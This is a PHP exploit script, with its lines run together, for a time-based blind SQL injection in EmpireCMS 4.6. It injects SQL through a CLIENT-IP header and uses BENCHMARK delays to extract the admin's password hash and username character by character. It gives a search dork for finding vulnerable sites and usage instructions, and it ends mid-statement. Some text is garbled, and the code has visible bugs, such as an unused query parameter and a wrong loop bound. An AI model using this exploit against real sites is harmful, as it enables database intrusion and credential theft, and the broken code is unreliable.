Empirecms4.6 Blind SQL Injection Exploit

1.    <?php2.    /*3.            EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit4.            fuck php>=5(©ҪϵͳԱֹʱЧ)5.            author...: Flyh4t6.            mail.....: flyh4t@126.com7.            link.....: http://hi.baidu.com/flyhat8.            dork.....: "Powered by EmpireCMS"9.    */10. 11. 12.    error_reporting(0);13.    ini_set("default_socket_timeout",5);14.    set_time_limit(0);15. 16.    function http_send($host, $packet)17.    {18.            $i = 0;19.            $sock = fsockopen($host, 80);20.            while (!$sock)21.            {22.                    if ($i++ == 10) die();23.                    print "\n[-] No response from ".$host.":80 Trying again...\n";24.                    $sock = fsockopen($host,$port);25.                    sleep(1);26.            }27.            fputs($sock, $packet);28.            $resp = "";29.            while (!feof($sock)) $resp .= fread($sock, 1);30.            fclose($sock);31.            return $resp;32.    }33. 34.    function getmicrotime()35.    {36.            list($usec, $sec) = explode(" ", microtime());37.            return ((float)$usec + (float)$sec);38.    }39. 40.    function getdelay($query)41.    {42.            global $host, $path;43.           44.            $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n";45.            $pck .= "Accept: */*\r\n";46.        $pck .= "Accept-Language: zh-cn\r\n";47.        $pck .= "Accept-Encoding: gzip, deflate\r\n";48.        $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n";49.        $pck .= "CLIENT-IP: $sql\r\n";50.               $pck.= "Host: ".$host."\r\n";51.            $pck.= "Keep-Alive: 300\r\n";52.            $pck.= "Connection: keep-alive\r\n\r\n";53.            $start = getmicrotime()*1000;54.            http_send($host, $pck);55.            $end = getmicrotime()*1000;56. 57.            return ($end - $start);58.    }59. 60.    function normaldelay()61.    {62.            global $count, $prefix, $uid;63.           64.            $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*";65.            $d1 = getdelay($sql);66.            $d2 = getdelay($sql);67.            $d3 = getdelay($sql);68.            $m = ($d1 + $d2 + $d3) / 3;69.            return (intval($m));70.    }71. 72.    function benchmarkdelay()73.    {74.            global $count, $prefix, $uid;75.       76.            $sql = "1' union SELECT/**/username/**/FROM/**/".$prefix."_enewsuser/**/WHERE/**/userid=".$uid."/**/AND/**/RAND(IF(1=0,BENCHMARK(".$count.",MD5(1)),0))/*";77.            $d1 = getdelay($sql);78.            $d2 = getdelay($sql);79.            $d3 = getdelay($sql);80.            $m = ($d1 + $d2 + $d3) / 3;81.            return (intval($m));82.    }83. 84.    function check_query($query)85.    {86.            global $ndelay;87.           88.            $ret = false;89.            $d = intval(getdelay($query));90.            if ($d > ($ndelay * 2)) $ret = true;91.            return $ret;92.    }93. 94.    function check_target()95.    {96.            global $host, $path;97.           98.            print "\n[-] Checking $host...";99.            $pck = "GET ".$path."/e/tool/gfen/index.php?id=1 HTTP/1.1\r\n";100.            $pck .= "Accept: */*\r\n";101.        $pck .= "Accept-Language: zh-cn\r\n";102.        $pck .= "Accept-Encoding: gzip, deflate\r\n";103.        $pck .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n";104.        $pck .= "CLIENT-IP: 127.0.0.1' union select 1/*\r\n";105.               $pck.= "Host: ".$host."\r\n";106.            $pck.= "Keep-Alive: 300\r\n";107.            $pck.= "Connection: keep-alive\r\n\r\n";108.            $buff = http_send($host, $pck);109.            if (!strpos($buff, "Location"))110.                    die("\n\n[-] Error... Probably wrong MySQL version!\n");111.            else112.                    print " OK!\n";113.    }114. 115.    print "\n+-----------------------------------------------------------------------------+";116.    print "\n| EmpireCMS Version 4.6 (/e/tool/gfen/index.php) Blind SQL Injection Exploit  |";117.    print "\n| by flyh4t[cnsst.org]                                                        |";118.    print "\n| thx EgiX                                                                    |";119.    print "\n+-----------------------------------------------------------------------------+\n";120. 121.    if ($argc < 3)122.    {123.            print "\nUsage:                php $argv[0] host path [delay] [prefix] [userid]\n";124.            print "\nhost:                target server (ip/hostname)";125.            print "\npath:                path to ecms directory";126.            print "\ndelay:                delay for BENCHMARK() (dafault: 1000000)";127.            print "\nprefix:                table's prefix (default: phome)";128.            print "\nuserid:                user id (default: 1 - admin)\n";129.            die();130.    }131. 132.    $host        = $argv[1];133.    $path        = $argv[2];134.    $count        = (isset($argv[3]) ? $argv[3] : 1000000);135.    $prefix        = (isset($argv[4]) ? $argv[4] : "phome");136.    $uid        = (isset($argv[5]) ? $argv[5] : "1");137. 138.    check_target();139. 140.    print "\n[-] Testing delay time...";141.    $ndelay = normaldelay();142.    print "\n[-] Normal delay: $ndelay ms";143.    $bdelay = benchmarkdelay();144.    print "\n[-] Benchmark delay: $bdelay ms\n";145. 146.    $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);147.    $index = 1; $md5 = "";148.    print "\n[-] MD5 Hash: ";149. 150.    while (!strpos($md5, chr(0)))151.    {152.            for ($i = 0; $i <= count($hash); $i++)153.            {154.                      if ($i == count($hash)) die("\n[-] Exploit failed...\n");155.                    $sql = "127.0.0.1' union SELECT/**/password/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" .156.                    "RAND(IF((ORD(SUBSTRING(password,".$index.",1))=".$hash[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*";157. 158.                    if (check_query($sql))159.                    {160. 161.                            $md5 .= chr($hash[$i]);162.                            print chr($hash[$i]);163.                            break;164.                    }165.            }166. 167.            $index++;168.    }169. 170.    $char = array(0); // null char171.    for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z172.    for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z173.    for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9174. 175.    $index = 1; $user = "";176.    print "\n[-] Username: ";177. 178.    while (!strpos($user, chr(0)))179.    {180.            for ($i = 0; $i <= count($hash); $i++)181.            {182.                      if ($i == count($hash)) die("\n[-] Exploit failed...\n");183. 184.                    $sql = "127.0.0.1' union SELECT/**/username/**/FROM/**/".$prefix."_users/**/WHERE/**/userid=".$uid."/**/OR/**/" .185.                    "RAND(IF((ORD(SUBSTRING(username,".$index.",1))=".$char[$i]."),BENCHMARK(".$count.",MD5(1)),1))/*";186. 187.                    if (check_query($sql))188.                    {189.                            $user .= chr($char[$i]);190.                            print chr($char[$i]);191.                            break;192.                    }193.            }194. 195.            $index++;196.    }197. 198.    print 